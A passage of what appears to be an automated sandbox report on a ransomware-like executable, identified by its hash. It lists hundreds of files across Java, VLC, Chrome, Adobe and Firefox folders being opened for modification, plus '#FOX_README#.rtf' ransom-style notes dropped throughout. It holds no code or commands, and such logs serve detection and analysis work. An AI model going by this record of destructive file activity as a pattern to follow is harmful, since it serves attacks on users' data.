Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Rome f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\nacl_irt_x86_64.nexe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ExitStop.M2TS f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\README.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nome f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Asuncion f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST5EDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\fonts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Makassar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guayaquil f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Accra f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Jujuy f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tarawa f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guyana f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Thimphu f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoDev.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Merida f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Efate f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wake f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bg.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar 